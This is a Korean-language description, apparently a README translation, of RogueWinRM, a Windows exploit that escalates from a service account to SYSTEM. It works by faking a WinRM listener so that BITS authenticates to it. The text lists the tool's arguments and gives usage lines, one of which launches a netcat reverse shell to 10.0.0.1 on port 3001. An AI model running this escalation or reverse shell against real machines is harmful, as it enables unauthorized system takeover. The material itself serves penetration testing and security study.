
서비스 계정에서 시스템으로의 Windows 로컬 권한 상승
RogueWinRM은 SeImpersonatePrivilege 권한이 있는 서비스 계정에서 WinRM 서비스가 실행되지 않을 경우(Win10 기본값이지만 Windows Server 2019에서는 아님) 로컬 시스템 계정으로 권한 상승을 가능하게 하는 로컬 권한 상승 익스플로잇입니다.
간단히 설명하자면, 실제 WinRM 서비스를 가장하여 포트 5985에서 들어오는 연결을 수신합니다.
이는 해당 포트에 연결하려는 모든 서비스와 NTLM 인증을 협상하려는 최소한의 웹 서버일 뿐입니다.
그러면 BITS 서비스(Local System으로 실행)가 트리거되어 우리의 가짜 리스너에 인증을 시도합니다. 가짜 리스너에 인증되면, 해당 권한으로 임의의 프로세스를 생성하여 Local System 사용자를 가장할 수 있습니다.
이 취약점에 대한 전체 기술 설명은 다음 링크에서 확인할 수 있습니다 --> https://decoder.cloud/2019/12/06/we-thought-they-were-potatoes-but-they-were-beans/
RogueWinRM
Mandatory args:
-p <program>: program to launch
Optional args:
-a <argument>: command line argument to pass to program (default NULL)
-l <port>: listening port (default 5985 WinRM)
-d : Enable Debugging output

대화형 cmd 실행:
RogueWinRM.exe -p C:\windows\system32\cmd.exe
netcat 리버스 셸 실행:
RogueWinRM.exe -p C:\windows\temp\nc64.exe -a "10.0.0.1 3001 -e cmd"